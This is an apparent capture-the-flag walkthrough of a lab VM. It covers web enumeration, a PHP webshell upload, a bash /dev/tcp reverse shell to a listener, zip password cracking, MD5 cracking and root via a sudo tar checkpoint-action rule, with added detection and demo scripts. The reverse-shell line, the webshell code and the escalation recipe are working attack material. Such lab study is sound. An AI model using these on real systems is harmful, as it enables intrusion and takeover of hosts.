Uploader

[screenshot]

Information gathering

192.168.100.59

Port scan

```
┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# rustscan -a 192.168.100.59
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.59:80
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 15:43 +0800
Initiating ARP Ping Scan at 15:43
Scanning 192.168.100.59 [1 port]
Completed ARP Ping Scan at 15:43, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:43
Completed Parallel DNS resolution of 1 host. at 15:43, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 15:43
Scanning 192.168.100.59 [1 port]
Discovered open port 80/tcp on 192.168.100.59
Completed SYN Stealth Scan at 15:43, 0.01s elapsed (1 total ports)
Nmap scan report for 192.168.100.59
Host is up, received arp-response (0.0015s latency).
Scanned at 2026-03-23 15:43:42 CST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:ED:52:CC (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
```

Only 80/tcp is open, so the whole attack surface is the web application.

Enumerating 80/tcp

```
┌──(root㉿LAPTOP-O235O5EH)-[/opt/penelope]
└─# gobuster dir -u http://192.168.100.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -o fuzz
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.59/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
uploads              (Status: 301) [Size: 318] [--> http://192.168.100.59/uploads/]
upload.php           (Status: 200) [Size: 3277]
server-status        (Status: 403) [Size: 279]
Progress: 661674 / 661674 (100.00%)
===============================================================
Finished
===============================================================
```

upload.php is a file-upload page, and it does not restrict the .php extension at all, so a PHP one-liner webshell can be uploaded directly. The uploads/ directory found above is where it lands, and since the server executes PHP from there, the upload becomes remote code execution.

[screenshot]

[screenshot]

Each upload is stored in a randomly named subdirectory created under uploads/ (the shell prompt later in this write-up shows one of the form cloud_325b6f). The directory name is visible in the response, so it does not hide the file; it only changes the URL that has to be requested.
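The flip side of this step is how a defender (or a tester cleaning up after an engagement) finds such a file: the webshell is plain text containing a PHP open tag, whatever extension it was saved under. The following is an added example, not code from the original write-up; the upload tree it scans is constructed inline (the `cloud_*` directory names and file names are made up to mirror the layout above).

```shell
#!/bin/sh
# Added example: scan an upload directory for files that contain PHP code,
# regardless of extension. Sample tree is constructed below.

scan_uploads() {
    dir="$1"
    # -r: recurse into the per-upload subdirectories, -l: print file names only,
    # -I: skip binary files, -i: case-insensitive. The pattern matches the
    # normal open tag, the short echo tag and the <script language=php> form.
    grep -rlIiE '<\?(php|=)|<script[^>]+language=.?php' "$dir" 2>/dev/null | sort
}

# Build a throwaway uploads tree: one obvious webshell, one benign file and
# one shell hidden behind an image extension (all contents constructed here).
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/uploads/cloud_deadbeef" "$root/uploads/cloud_c0ffee"
    printf '<?php system($_GET["cmd"]); ?>\n' > "$root/uploads/cloud_deadbeef/shell.php"
    printf 'not really a JPEG, just text\n' > "$root/uploads/cloud_c0ffee/photo.jpg"
    printf 'GIF89a\n<?php eval($_POST["x"]); ?>\n' > "$root/uploads/cloud_c0ffee/avatar.gif"
    echo "$root"
}

# Usage: scan a directory given on the command line, otherwise run the demo.
if [ -n "${1:-}" ]; then
    scan_uploads "$1"
else
    root=$(make_sample_tree)
    scan_uploads "$root/uploads"
    rm -rf "$root"
fi
```

The check is deliberately extension-agnostic: a file named avatar.gif that starts with a GIF header but carries `<?php` is still reported, which is exactly the case a naive "is the extension .php?" filter misses.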

[screenshot]

Reverse shell

With a listener waiting on 192.168.100.12:9999, request the uploaded webshell with the command in the cmd parameter. The `&` characters of the bash redirection are sent as %26, because a raw `&` in the query string would end the cmd parameter and the server would only see the first half of the command:

```
?cmd=bash -c 'exec bash -i %26>/dev/tcp/192.168.100.12/9999 <%261'
```

[screenshot]

Privilege escalation

www (the web-server account) -> operatorx

There is a hint in /home:

Readme.txt

[screenshot]

The archive is stashed somewhere out of the way, so search the whole filesystem for root-owned .zip files (stderr is discarded to hide the permission-denied noise):

```
find / -type f -iname "*.zip" -user root -ls 2>/dev/null
```

[screenshot]

Pull it back to Kali for analysis.

[screenshot]

Extracting it prompts for a password.

[screenshot]

Cracking the password

```
┌──(root㉿LAPTOP-O235O5EH)-[/home]
└─# zip2john File.zip >zip
ver 2.0 File.zip/Credentials/ is not encrypted, or stored with non-handled compression type

┌──(root㉿LAPTOP-O235O5EH)-[/home]
└─# john zip --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 64 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
121288           (File.zip/Credentials/Credentials.txt)
1g 0:00:00:00 DONE (2026-03-24 19:09) 10.00g/s 491520p/s 491520c/s 491520C/s 123456..trudy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

The password is 121288. (The zip2john warning refers only to the Credentials/ directory entry, which carries no data; the hash for Credentials.txt itself was loaded and cracked.)

Extract

```
┌──(root㉿LAPTOP-O235O5EH)-[/home]
└─# 7z x File.zip

7-Zip 26.00 (x64) : Copyright (c) 1999-2026 Igor Pavlov : 2026-02-12
64-bit locale=en_US.UTF-8 Threads:24 OPEN_MAX:10240, ASM

Scanning the drive for archives:
1 file, 430 bytes (1 KiB)

Extracting archive: File.zip
--
Path = File.zip
Type = zip
Physical Size = 430


Enter password (will not be echoed):
Everything is Ok

Folders: 1
Files: 1
Size:       67
Compressed: 430

┌──(root㉿LAPTOP-O235O5EH)-[/home]
└─# ls
Credentials  Eecho  File.zip  zip
```

Moving to the operatorx user

```
┌──(root㉿LAPTOP-O235O5EH)-[/home/Credentials]
└─# ls
Credentials.txt

┌──(root㉿LAPTOP-O235O5EH)-[/home/Credentials]
└─# cat Credentials.txt
User: operatorx

Password: d0970714757783e6cf17b26fb8e2298f
```

operatorx -> root

Switching to operatorx with that value as the password fails. On closer inspection it is not a password at all but a 32-hex-digit MD5 digest, so it has to be cracked (looked up) first, for example at:

https://www.cmd5.com/
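Sending a hash from a target to a third-party lookup site leaks engagement data, and the same recognition-and-crack step can be done locally. The following is an added example, not from the original write-up: it checks that a string has the shape of an MD5 digest and then tries each word of a wordlist with md5sum. The wordlist here is constructed (a few entries standing in for rockyou.txt) and the hashes it cracks are of those constructed words; the plaintext behind the operatorx digest above is not shown here.

```shell
#!/bin/sh
# Added example: recognise a 32-hex-digit MD5 digest and crack it offline
# against a wordlist using md5sum instead of an online lookup service.

# looks_like_md5 STRING -> 0 if STRING is exactly 32 hex digits
looks_like_md5() {
    printf '%s\n' "$1" | grep -Eq '^[0-9a-fA-F]{32}$'
}

# crack_md5 HASH WORDLIST -> prints the matching word and returns 0;
# returns 1 if no word matches, 2 if HASH is not an MD5 digest.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    looks_like_md5 "$target" || { echo "not an MD5 digest: $1" >&2; return 2; }
    # "|| [ -n "$word" ]" keeps a last line that lacks a trailing newline.
    while IFS= read -r word || [ -n "$word" ]; do
        # printf, not echo: echo would append a newline and change the digest.
        h=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
        if [ "$h" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed mini wordlist standing in for rockyou.txt.
wordlist=$(mktemp)
printf '%s\n' 123456 password letmein operatorx > "$wordlist"
# md5("password") = 5f4dcc3b5aa765d61d8327deb882cf99
crack_md5 5f4dcc3b5aa765d61d8327deb882cf99 "$wordlist"
rm -f "$wordlist"
```

For a real wordlist this loop is slow (one md5sum process per candidate); the point is the recognition step and the offline workflow. For rockyou-sized lists, feed the digest to john or hashcat (raw-MD5 mode) instead.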

[screenshot]

[screenshot]

With the cracked password, operatorx can run tar as root via sudo without a password, which is a straightforward privilege escalation:

```
operatorx@TheHackersLabs-Operator:/var/www/html/uploads/cloud_325b6f$ sudo -l
Matching Defaults entries for operatorx on TheHackersLabs-Operator:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User operatorx may run the following commands on TheHackersLabs-Operator:
    (ALL) NOPASSWD: /usr/bin/tar
```

GTFOBins has a ready-made shell recipe for this: https://gtfobins.org/gtfobins/tar/#shell
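The recipe works because GNU tar's `--checkpoint-action=exec=CMD` runs CMD (through `sh -c`) each time a checkpoint fires, and `--checkpoint=1` fires one after the first record; under `sudo tar` that command runs as root. The following is an added example, not from the write-up or from GTFOBins: it exercises the same option pair without sudo, against a temporary directory, so the mechanism can be seen safely as the current user. The marker file name is an assumption made for the demo.

```shell
#!/bin/sh
# Added example: demonstrate the GNU tar checkpoint hook behind the
# "sudo tar" privilege escalation, run here WITHOUT sudo.
#
# The GTFOBins recipe itself (shown for reference, not executed here) is:
#   sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

# tar_checkpoint_demo -> 0 if the hook executed, 1 if it did not,
# 2 if GNU tar is not available (busybox/bsdtar lack --checkpoint).
tar_checkpoint_demo() {
    tar --version 2>/dev/null | grep -q 'GNU tar' || { echo "GNU tar required" >&2; return 2; }
    tmp=$(mktemp -d) || return 1
    marker="$tmp/ran-as-$(id -un)"        # assumed marker name for the demo
    # Archive /dev/null into /dev/null: no real data is touched, but the
    # first record still triggers the checkpoint, which runs the exec action.
    tar -cf /dev/null /dev/null --checkpoint=1 \
        --checkpoint-action=exec="touch $marker" >/dev/null 2>&1
    if [ -e "$marker" ]; then
        echo "checkpoint hook executed as $(id -un): $marker"
        rm -rf "$tmp"
        return 0
    fi
    rm -rf "$tmp"
    return 1
}

tar_checkpoint_demo
```

Replace `touch` with `/bin/sh` and prefix the command with `sudo`, as the GTFOBins entry does, and the hook is an interactive root shell. The defensive reading is the same: a NOPASSWD sudo rule for tar is equivalent to root, and sudoers entries for archivers, editors and interpreters should be reviewed against GTFOBins before they are granted.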

[screenshot]

[screenshot]